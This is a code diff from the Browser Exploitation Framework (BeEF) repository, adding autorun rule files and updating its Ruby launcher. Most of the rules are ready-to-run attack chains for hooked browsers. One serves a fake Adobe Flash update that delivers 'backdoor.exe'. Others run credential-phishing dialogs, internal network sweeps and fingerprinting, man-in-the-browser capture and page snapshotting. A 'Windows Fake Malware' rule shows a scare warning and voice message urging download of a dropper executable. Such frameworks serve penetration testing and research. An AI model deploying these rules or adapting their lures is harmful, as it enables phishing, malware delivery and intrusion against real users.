+      "url": "http://172.16.45.1:3000/updates/backdoor.exe",
+      "notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
+    }
+  }, {
+    "name": "pretty_theft",
+    "condition": null,
+    "options": {
+      "choice": "Windows",
+      "backing": "Grey",
+      "imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
+    }
+  }],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 5000],
+  "chain_mode": "sequential"
+}

arerules/ie_win_test-return-mods.json

@@ -0,0 +1,35 @@
+{
+  "name": "Test return debug stuff",
+  "author": "antisnatchor",
+  "browser": "IE",
+  "browser_version": "<= 8",
+  "os": "Windows",
+  "os_version": ">= XP",
+  "modules": [{
+    "name": "test_return_ascii_chars",
+    "condition": null,
+    "options": {}
+  }, {
+    "name": "test_return_long_string",
+    "condition": "status==1",
+    "code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
+    "options": {
+      "repeat": "10",
+      "repeat_string": "<<mod_input>>"
+    }
+  },
+    {
+      "name": "alert_dialog",
+      "condition": "status=1",
+      "code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
+      "options":{"text":"<<mod_input>>"}
+    },
+   {
+    "name": "get_page_html",
+    "condition": null,
+    "options": {}
+  }],
+  "execution_order": [0, 1, 2, 3],
+  "execution_delay": [0, 0, 0, 0],
+  "chain_mode": "nested-forward"
+}

arerules/lan_cors_scan.json

@@ -0,0 +1,28 @@
+{"name": "LAN CORS Scan",
+  "author": "bcoles",
+  "browser": ["FF", "C"],
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "cross_origin_scanner_cors",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
+      "options": {
+        "ipRange":"<<mod_input>>",
+        "ports":"80,8080",
+        "threads":"2",
+        "wait":"2",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}

arerules/lan_cors_scan_common.json

@@ -0,0 +1,23 @@
+{"name": "LAN CORS Scan (Common IPs)",
+  "author": "bcoles",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "cross_origin_scanner_cors",
+      "condition": null,
+      "code": null,
+      "options": {
+        "ipRange":"common",
+        "ports":"80,8080",
+        "threads":"2",
+        "wait":"2",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/lan_fingerprint.json

@@ -0,0 +1,28 @@
+{"name": "LAN Fingerprint",
+  "author": "bcoles",
+  "browser": ["FF", "C"],
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "internal_network_fingerprinting",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
+      "options": {
+        "ipRange":"<<mod_input>>",
+        "ports":"80,8080",
+        "threads":"3",
+        "wait":"5",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}

arerules/lan_fingerprint_common.json

@@ -0,0 +1,23 @@
+{"name": "LAN Fingerprint (Common IPs)",
+  "author": "antisnatchor",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "internal_network_fingerprinting",
+      "condition": null,
+      "code": null,
+      "options": {
+        "ipRange":"common",
+        "ports":"80,8080",
+        "threads":"3",
+        "wait":"5",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/lan_flash_scan.json

@@ -0,0 +1,27 @@
+{"name": "LAN Flash Scan",
+  "author": "bcoles",
+  "browser": ["FF", "C"],
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "cross_origin_scanner_flash",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
+      "options": {
+        "ipRange":"<<mod_input>>",
+        "ports":"80,8080",
+        "threads":"2",
+        "timeout":"5"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}

arerules/lan_flash_scan_common.json

@@ -0,0 +1,22 @@
+{"name": "LAN Flash Scan (Common IPs)",
+  "author": "bcoles",
+  "browser": ["FF", "C"],
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "cross_origin_scanner_flash",
+      "condition": null,
+      "code": null,
+      "options": {
+        "ipRange":"common",
+        "ports":"80,8080",
+        "threads":"2",
+        "timeout":"5"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/lan_http_scan.json

@@ -0,0 +1,28 @@
+{"name": "LAN HTTP Scan",
+  "author": "bcoles",
+  "browser": ["FF", "C"],
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "get_http_servers",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
+      "options": {
+        "rhosts":"<<mod_input>>",
+        "ports":"80,8080",
+        "threads":"3",
+        "wait":"5",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}

arerules/lan_http_scan_common.json

@@ -0,0 +1,23 @@
+{"name": "LAN HTTP Scan (Common IPs)",
+  "author": "bcoles",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_http_servers",
+      "condition": null,
+      "code": null,
+      "options": {
+        "rhosts":"common",
+        "ports":"80,8080",
+        "threads":"3",
+        "wait":"5",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/lan_ping_sweep.json

@@ -0,0 +1,25 @@
+{"name": "LAN Ping Sweep",
+  "author": "bcoles",
+  "browser": "FF",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "ping_sweep",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
+      "options": {
+        "rhosts":"<<mod_input>>",
+        "threads":"3"
+      }
+    }
+  ],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}

arerules/lan_ping_sweep_common.json

@@ -0,0 +1,20 @@
+{"name": "LAN Ping Sweep (Common IPs)",
+  "author": "bcoles",
+  "browser": "FF",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "ping_sweep",
+      "condition": null,
+      "code": null,
+      "options": {
+        "rhosts":"common",
+        "threads":"3"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/man_in_the_browser.json

@@ -0,0 +1,17 @@
+{"name": "Perform Man-In-The-Browser",
+  "author": "mgeeky",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "man_in_the_browser",
+      "condition": null,
+      "code": null,
+      "options": {}
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/raw_javascript.json

@@ -0,0 +1,19 @@
+{
+  "name": "Raw JavaScript",
+  "author": "wade@bindshell.net",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "raw_javascript",
+      "condition": null,
+      "options": {
+         "cmd": "alert(0xBeEF);"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/record_snapshots.json

@@ -0,0 +1,19 @@
+{"name": "Collects multiple snapshots of the webpage within Same-Origin",
+  "author": "mgeeky",
+  "browser": ["FF", "C", "O", "IE", "S"],
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "spyder_eye",
+      "condition": null,
+      "options": {
+        "repeat":"10",
+        "delay":"3000"
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

arerules/win_fake_malware.json

@@ -0,0 +1,38 @@
+// note: update your dropper URL (dropper.local) in each of the modules below
+{
+  "name": "Windows Fake Malware",
+  "author": "bcoles",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "Windows",
+  "os_version": "ALL",
+  "modules": [
+    {
+      "name": "blockui",
+      "condition": null,
+      "options": {
+        "message": "<img src='data:image/png;base64,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'/><p>This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer before you do any shopping online. <p><a href='http://dropper.local/malware_removal_tool.exe' onclick='$j.unblockUI();'>Microsoft Malware Removal Toolkit</a></p>",
+        "timeout": "9999"
+      }
+    },
+    {
+      "name": "text_to_voice",
+      "condition": null,
+      "options": {
+        "message": "This is an important security warning. Your system is infected with a virus. It's strongly advised that you run the provided malware removal tool to fix your computer; before you do any shopping online.",
+        "language": "en"
+      }
+    },
+    {
+      "name": "fake_notification_ie",
+      "condition": null,
+      "options": {
+        "url": "http://dropper.local/malware_removal_tool.exe",
+        "notification_text": "SECURITY WARNING: Download the <a href='http://dropper.local/malware_removal_tool.exe' title='Microsoft Malware Removal Toolkit'>Microsoft Malware Removal Toolkit</a> as soon as possible."
+      }
+    }
+  ],
+  "execution_order": [0,1,2],
+  "execution_delay": [0,0,0],
+  "chain_mode": "sequential"
+}

beef

@@ -1,55 +1,87 @@
 #!/usr/bin/env ruby
 
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 
-# stop deprecation warning from being displayed
+#
+# @note stop Fixnum deprecation warning from being displayed
+#
 $VERBOSE = nil
 
-# @note Version check to ensure BeEF is running Ruby 1.9 >
-if  RUBY_VERSION < '1.9'
-  puts "\n"
-  puts "Ruby version " + RUBY_VERSION + " is no longer supported. Please upgrade 1.9 or later."
-  puts "OSX:"
-  puts "See Readme"
-  puts "\n"
-  exit
+#
+# @note Version check to ensure BeEF is running Ruby 2.4+
+#
+if RUBY_VERSION < '2.4'
+  puts
+  puts "Ruby version #{RUBY_VERSION} is no longer supported. Please upgrade to Ruby version 2.4 or later."
+  puts
+  exit 1
 end
 
-$:.unshift(File.join(File.expand_path(File.dirname(__FILE__)), '.'))
-$root_dir = File.expand_path('..', __FILE__)
-
-# @note Prevent some errors on encoding: encoding handling changed (improved) from 1.8.7 to 1.9.1/2.
-if RUBY_VERSION =~ /1.9/
-  Encoding.default_external = Encoding::UTF_8
-  Encoding.default_internal = Encoding::UTF_8
+#
+# @note Platform check to ensure BeEF is not running on Windows
+#
+if RUBY_PLATFORM.downcase.include?('mswin') || RUBY_PLATFORM.downcase.include?('mingw')
+  puts
+  puts "Ruby platform #{RUBY_PLATFORM} is not supported."
+  puts
+  exit 1
 end
 
-# @note Require core loader's
+#
+# @note set load path, application root directory and user preferences directory
+#
+$root_dir = File.join(File.expand_path(File.dirname(File.realpath(__FILE__))), '.')
+$:.unshift($root_dir)
+$home_dir = File.expand_path("#{Dir.home}/.beef/", __FILE__).freeze
+
+#
+# @note Require core loader
+#
 require 'core/loader'
 
-# @note Initialize the Configuration object. Eventually loads a different config.yaml if -c flag was passed.
+#
+# @note Create ~/.beef/
+#
+begin
+  FileUtils.mkdir_p($home_dir) unless File.directory?($home_dir)
+rescue => e
+  print_error "Could not create '#{$home_dir}': #{e.message}"
+  exit 1
+end
+
+#
+# @note Initialize the Configuration object. Loads a different config.yaml if -c flag was passed.
+#
 if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
   config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
 else
-  config = BeEF::Core::Configuration.new("#{$root_dir}/#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
+  config = BeEF::Core::Configuration.new("#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
 end
 
-# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
-require 'core/bootstrap'
+#
+# @note set log level
+#
+BeEF.logger.level = config.get('beef.debug') ? Logger::DEBUG : Logger::WARN
 
-# @note Loads enabled extensions
-BeEF::Extensions.load
-
-# @note Prints the BeEF ascii art if the -a flag was passed
-if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
-  BeEF::Core::Console::Banners.print_ascii_art
+#
+# @note Check the system language settings for UTF-8 compatibility
+#
+env_lang = ENV['LANG']
+if env_lang !~ /(utf8|utf-8)/i
+  print_warning "Warning: System language $LANG '#{env_lang}' does not appear to be UTF-8 compatible."
+  if env_lang =~ /\A([a-z]+_[a-z]+)\./i
+    country = $1
+    print_more "Try: export LANG=#{country}.utf8"
+  end
 end
 
+#
 # @note Check if port and WebSocket port need to be updated from command line parameters
+#
 unless BeEF::Core::Console::CommandLine.parse[:port].empty?
   config.set('beef.http.port', BeEF::Core::Console::CommandLine.parse[:port])
 end
@@ -58,16 +90,78 @@ unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
   config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
 end
 
+#
+# @note Validate configuration file
+#
+unless BeEF::Core::Configuration.instance.validate
+  exit 1
+end
+
+#
+# @note Exit on default credentials
+#
+if config.get("beef.credentials.user").eql?('beef') && config.get("beef.credentials.passwd").eql?('beef')
+  print_error "ERROR: Default username and password in use!"
+  print_more "Change the beef.credentials.passwd in config.yaml"
+  exit 1
+end
+
+#
+# @note Validate beef.http.public and beef.http.public_port
+#
+unless config.get('beef.http.public').to_s.eql?('') || BeEF::Filters.is_valid_hostname?(config.get('beef.http.public'))
+  print_error "ERROR: Invalid public hostname: #{config.get('beef.http.public')}"
+  exit 1
+end
+
+unless config.get('beef.http.public_port').to_s.eql?('') || BeEF::Filters.is_valid_port?(config.get('beef.http.public_port'))
+  print_error "ERROR: Invalid public port: #{config.get('beef.http.public_port')}"
+  exit 1
+end
+
+#
+# @note Validate database driver
+#
+unless ['sqlite', 'postgres', 'mysql'].include? config.get('beef.database.driver')
+  print_error 'No default database selected. Please add one in config.yaml'
+  exit 1
+end
+
+#
+# @note After the BeEF core is loaded, bootstrap the rest of the framework internals
+#
+require 'core/bootstrap'
+
+#
+# @note Prints the BeEF ascii art if the -a flag was passed
+#
+if BeEF::Core::Console::CommandLine.parse[:ascii_art] == true
+  BeEF::Core::Console::Banners.print_ascii_art
+end
+
+#
 # @note Prints BeEF welcome message
+#
 BeEF::Core::Console::Banners.print_welcome_msg
 
+#
+# @note Loads enabled extensions
+#
+BeEF::Extensions.load
+
+#
 # @note Loads enabled modules
+#
 BeEF::Modules.load
 
-# @note Disable reverse dns
+#
+# @note Disable reverse DNS
+#
 Socket.do_not_reverse_lookup = true
 
+#
 # @note Database setup - use DataMapper::Logger.new($stdout, :debug) for development debugging
+#
 case config.get("beef.database.driver")
   when "sqlite"
     DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
@@ -83,59 +177,82 @@ case config.get("beef.database.driver")
     )
   else
     print_error 'No default database selected. Please add one in config.yaml'
+    exit 1
 end
 
-# @note Resets the database if the -x flag was passed
-if BeEF::Core::Console::CommandLine.parse[:resetdb]
-  print_info 'Resetting the database for BeEF.'
-  DataMapper.auto_migrate!
-else
-  DataMapper.auto_upgrade!
+#
+# @note Load the database
+#
+begin
+  # @note Resets the database if the -x flag was passed
+  if BeEF::Core::Console::CommandLine.parse[:resetdb]
+    print_info 'Resetting the database for BeEF.'
+    DataMapper.auto_migrate!
+  else
+    DataMapper.auto_upgrade!
+  end
+rescue => e
+  print_error "Could not connect to database: #{e.message}"
+  if config.get("beef.database.driver") == 'sqlite'
+    print_error "Ensure the #{$root_dir}/#{config.get("beef.database.db_file")} database file is writable"
+  end
+  exit 1
 end
 
+#
 # @note Extensions may take a moment to load, thus we print out a please wait message
+#
 print_info 'BeEF is loading. Wait a few seconds...'
 
+#
 # @note Execute migration procedure, checks for new modules
+#
 BeEF::Core::Migration.instance.update_db!
 
+#
 # @note Create HTTP Server and prepare it to run
+#
 http_hook_server = BeEF::Core::Server.instance
 http_hook_server.prepare
 
+#
 # @note Prints information back to the user before running the server
+#
 BeEF::Core::Console::Banners.print_loaded_extensions
 BeEF::Core::Console::Banners.print_loaded_modules
 BeEF::Core::Console::Banners.print_network_interfaces_count
 BeEF::Core::Console::Banners.print_network_interfaces_routes
 
-#@note Prints the API key needed to use the RESTful API
+#
+# @note Prints the API key needed to use the RESTful API
+#
 print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
 
-#@note Starts the WebSocket server
-if config.get("beef.http.websocket.enable")
-  BeEF::Core::Websocket::Websocket.instance
-  print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
-  if config.get("beef.http.websocket.secure")
-    print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
-  end
-end
-
+#
+# @note Load the GeoIP database
+#
+BeEF::Core::GeoIp.instance
 
+#
 # @note Call the API method 'pre_http_start'
+#
 BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)
 
-# @note Start the HTTP Server, we additionally check whether we load the Console Shell or not
-if config.get("beef.extension.console.shell.enable") == true
-  require 'extensions/console/shell'
-  puts ""
-  begin
-    FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
-    BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
-                                        BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
-  rescue Interrupt
-  end
-else
-  print_info 'BeEF server started (press control+c to stop)'
-  http_hook_server.start
+#
+# @note Load any ARE (Autorun Rule Engine) rules scanning the <beef_root>/arerules/enabled directory
+#
+BeEF::Core::AutorunEngine::RuleLoader.instance.load_directory
+
+#
+# @note Start the WebSocket server
+#
+if config.get("beef.http.websocket.enable")
+  BeEF::Core::Websocket::Websocket.instance
+  BeEF::Core::Console::Banners.print_websocket_servers
 end
+
+#
+# @note Start HTTP server
+#
+print_info 'BeEF server started (press control+c to stop)'
+http_hook_server.start

beef_cert.pem

@@ -1,19 +1,24 @@
 -----BEGIN CERTIFICATE-----
-MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD
-VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL
-BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw
-bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp
-dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ
-BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN
-MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF
-eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3
-cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2
-VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP
